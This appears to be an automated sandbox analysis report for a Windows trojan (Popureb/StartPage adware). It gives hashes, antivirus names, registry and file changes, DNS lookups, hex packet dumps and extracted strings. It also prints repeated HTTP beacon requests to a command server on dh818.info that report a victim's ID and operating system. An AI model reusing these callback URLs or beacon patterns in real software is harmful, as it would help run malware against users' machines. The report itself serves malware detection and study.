Analysis Date: 2013-11-05 15:06:07
MD5: 487e7db60dac93954970939bd60a8fa1
SHA1: a148137d5280540c42aad254d74447888f60c5ab

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 8d3795900617ce1bf420fa24216a58b0 sha1: 6337baa0683e82ab4a6ecc1f8780281b813a593e size: 53248
Section .rsrc: md5: d6a81442aa12bdebc0d8b8e2dcb9ccc8 sha1: 2649283c0fedfa5a29bf6d9eae36e6bc4221c76b size: 3584
Timestamp: 2011-04-24 13:43:05
Packer: Microsoft Visual C++ v6.0
PEhash: cf1d6e153f4a6afb5cff44629cb17b26bbfe5a77
AV (msse): Trojan:Win32/Popureb.C
AV (avg): Generic22.ARCC
AV (avira): TR/StartPage.RR

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: PHYSICALDRIVE0
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\All Users\Documents\My Videos\PulgFile.log
Creates File: \Device\Afd\Endpoint
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: IE_2011_Mutex
Winsock DNS: 2.dh818.info
Winsock DNS: 1.dh818.info

Network Details:

DNS: 1.dh818.info
Type: A
82.98.86.174
DNS: 2.dh818.info
Type: A
82.98.86.174
HTTP GET: http://1.dh818.info:83/3/logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-11-5_14:29:32&msg=0170283D524047&ver=&os=Windows%20XP&fy=0&pauid=10211&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/3/pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-11-5_14:29:32&msg=0170283D524047&ver=&os=Windows%20XP&fy=0&pauid=10211&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/3/logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-11-5_14:29:32&msg=0170283D524047&ver=&os=Windows%20XP&fy=0&pauid=10211&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/3/pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-11-5_14:29:32&msg=0170283D524047&ver=&os=Windows%20XP&fy=0&pauid=10211&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/3/logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/3/pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-11-5_14:29:32&msg=0170283D524047&ver=&os=Windows%20XP&fy=0&pauid=10211&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/3/logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-11-5_14:29:32&msg=0170283D524047&ver=&os=Windows%20XP&fy=0&pauid=10211&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/3/pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-11-5_14:29:32&msg=0170283D524047&ver=&os=Windows%20XP&fy=0&pauid=10211&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/3/logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/3/pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-11-5_14:29:32&msg=0170283D524047&ver=&os=Windows%20XP&fy=0&pauid=10211&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/3/logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-11-5_14:29:32&msg=0170283D524047&ver=&os=Windows%20XP&fy=0&pauid=10211&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/3/pop.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://2.dh818.info:83/sms/do.php?userid=XXXXXXXXXXXX&time=2013-11-5_14:29:32&msg=0170283D524047&ver=&os=Windows%20XP&fy=0&pauid=10211&checkId=652
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://1.dh818.info:83/3/logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1033 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1034 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1035 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1036 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1037 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1038 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1039 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1040 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1041 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1042 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1043 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1044 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1045 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1046 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1047 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1048 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1049 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1050 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1051 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1052 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1053 ➝ 82.98.86.174:83
Flows TCP: 192.168.1.1:1054 ➝ 82.98.86.174:83

Raw Pcap
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2032 2e646838 31382e69   .Host: 2.dh818.i
0x00000120 (00288)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x00000130 (00304)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000140 (00320)   0d0a                                  ..

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3131   XXX&time=2013-11
0x00000030 (00048)   2d355f31 343a3239 3a333226 6d73673d   -5_14:29:32&msg=
0x00000040 (00064)   30313730 32383344 35323430 34372676   0170283D524047&v
0x00000050 (00080)   65723d26 6f733d57 696e646f 77732532   er=&os=Windows%2
0x00000060 (00096)   30585026 66793d30 26706175 69643d31   0XP&fy=0&pauid=1
0x00000070 (00112)   30323131 26636865 636b4964 3d363532   0211&checkId=652
0x00000080 (00128)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000090 (00144)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x000000a0 (00160)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x000000b0 (00176)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x000000c0 (00192)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000d0 (00208)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2032 2e646838 31382e69   .Host: 2.dh818.i
0x00000120 (00288)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x00000130 (00304)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000140 (00320)   0d0a3332 33392033 61333333 32323620   ..3239 3a333226 
0x00000150 (00336)   36643733 36373364 2020202d 355f3134   6d73673d   -5_14
0x00000160 (00352)   3a32393a 3332266d 73673d0a            :29:32&msg=.

0x00000000 (00000)   47455420 2f332f70 6f702e67 69662048   GET /3/pop.gif H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20312e64 68383138 2e696e66   ost: 1.dh818.inf
0x000000b0 (00176)   6f3a3833 0d0a436f 6e6e6563 74696f6e   o:83..Connection
0x000000c0 (00192)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000d0 (00208)                                         

0x00000000 (00000)   47455420 2f736d73 2f646f2e 7068703f   GET /sms/do.php?
0x00000010 (00016)   75736572 69643d58 58585858 58585858   userid=XXXXXXXXX
0x00000020 (00032)   58585826 74696d65 3d323031 332d3131   XXX&time=2013-11
0x00000030 (00048)   2d355f31 343a3239 3a333226 6d73673d   -5_14:29:32&msg=
0x00000040 (00064)   30313730 32383344 35323430 34372676   0170283D524047&v
0x00000050 (00080)   65723d26 6f733d57 696e646f 77732532   er=&os=Windows%2
0x00000060 (00096)   30585026 66793d30 26706175 69643d31   0XP&fy=0&pauid=1
0x00000070 (00112)   30323131 26636865 636b4964 3d363532   0211&checkId=652
0x00000080 (00128)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000090 (00144)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x000000a0 (00160)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x000000b0 (00176)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x000000c0 (00192)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000d0 (00208)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2032 2e646838 31382e69   .Host: 2.dh818.i
0x00000120 (00288)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x00000130 (00304)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000140 (00320)   0d0a3332 33392033 61333333 32323620   ..3239 3a333226 
0x00000150 (00336)   36643733 36373364 2020202d 355f3134   6d73673d   -5_14
0x00000160 (00352)   3a32393a 3332266d 73673d0a            :29:32&msg=.

0x00000000 (00000)   47455420 2f332f6c 6f676f2e 67696620   GET /3/logo.gif 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a20312e 64683831 382e696e   Host: 1.dh818.in
0x000000b0 (00176)   666f3a38 330d0a43 6f6e6e65 6374696f   fo:83..Connectio
0x000000c0 (00192)   6e3a204b 6565702d 416c6976 650d0a0d   n: Keep-Alive...
0x000000d0 (00208)   0a636f6d 70617469 626c653b 204d5349   .compatible; MSI
0x000000e0 (00224)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000f0 (00240)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000100 (00256)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x00000110 (00272)   0a486f73 743a2032 2e646838 31382e69   .Host: 2.dh818.i
0x00000120 (00288)   6e666f3a 38330d0a 436f6e6e 65637469   nfo:83..Connecti
0x00000130 (00304)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000140 (00320)   0d0a3332 33392033 61333333 32323620   ..3239 3a333226 
0x00000150 (00336)   36643733 36373364 2020202d 355f3134   6d73673d   -5_14
0x00000160 (00352)   3a32393a 3332266d 73673d0a            :29:32&msg=.


Strings
ad%d
AllAdTimes
global
iC:\WINDOWS\VC.ini
LastAd
mHTTP
pass_url
url%d
0123456789ABCDEF
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
%02x%02x%02x%02x%02x%02x
??1type_info@@UAE@XZ
??2@YAPAXI@Z
??3@YAXPAX@Z
9a7b6r3k0u4e
_acmdln
_adjust_fdiv
AdjustTokenPrivileges
ad_num
Ad_Num%d
Ad_Time%d-1
Ad_Time%d-2
Ad_Type%d
Ad_Url%d
ADVAPI32.dll
AllAdTimes
.?AV_com_error@@
.?AVtype_info@@
BuildExplicitAccessWithNameA
chrome
CloseDesktop
CloseHandle
CoCreateInstance
CoInitialize
_controlfp
CoUninitialize
CreateDesktopA
CreateProcessW
CreateThread
__CxxFrameHandler
_CxxThrowException
DcomLaunch
DeleteFileA
\Device\HarddiskVolume1
\Device\HarddiskVolume2
\Device\HarddiskVolume3
\Device\HarddiskVolume4
\Device\HarddiskVolume5
\Device\HarddiskVolume6
__dllonexit
DwdInTime
Embedding
_except_handler3
explorer.exe
fclose
FindFirstFileA
FindNextFileA
FindWindowA
FindWindowExA
firefox
F\VC.ini
GetCommandLineA
GetCurrentProcess
GetCurrentThread
GetCurrentThreadId
GetLastError
GetLocalTime
GetLogicalDriveStringsA
__getmainargs
GetModuleHandleA
GetNamedSecurityInfoA
GetPrivateProfileIntA
GetPrivateProfileIntW
GetPrivateProfileStringW
GetProcAddress
GetProcessImageFileNameA
GetStartupInfoA
GetStartupInfoW
GetThreadDesktop
GetVersion
GetVersionExA
global
IDList
iexplore
_initterm
Internet Explorer.
InternetShortcut
IsWindow
KERNEL32.dll
LastAd
LoadLibraryA
LocalFree
LookupPrivilegeValueA
lstrcatW
lstrcmpiA
MACHINE\SOFTWARE\Classes\CLSID
malloc
maxthon
_mbslwr
_mbsnbcpy
_mbsstr
mbstowcs
MessageBoxA
MSVCRT.dll
MultiByteToWideChar
Name%d
ntdll.dll
ole32.dll
OLEAUT32.dll
OleRun
_onexit
OpenProcess
OpenProcessToken
OutputDebugStringA
pass_url
PathRemoveFileSpecA
__p__commode
__p__fmode
PopUrl
PostMessageA
printf
Progman
PSAPI.DLL
QueryDosDeviceA
RASAPI32.dll
RasEnumConnectionsA
RasGetErrorStringA
RasHangUpA
ReadProcessMemory
rename
SeDebugPrivilege
SendMessageA
__set_app_type
SetEntriesInAclA
SetNamedSecurityInfoA
SetThreadDesktop
SetThreadPriority
__setusermatherr
SHChangeNotify
SHELL32.dll
SHELLDLL_DefView
SHFileOperationA
SHGetSpecialFolderPathA
SHGetSpecialFolderPathW
SHLWAPI.dll
ShowCursor
_snprintf
sogouexplorer
sprintf
"%s" "%s"
%s\%s.lnk
%s%s%s
strchr
_strcmpi
strstr
svchost.exe
SysListView32
TerminateProcess
theworld
!This program cannot be run in DOS mode.
ttraveler
\*.url
url_num
USER32.dll
wcslen
_wcsupr
WideCharToMultiByte
WinExec
WndPerAd
wsprintfA
_XcptFilter
ZwQueryInformationProcess
ZwQuerySystemInformation
ZwTerminateProcess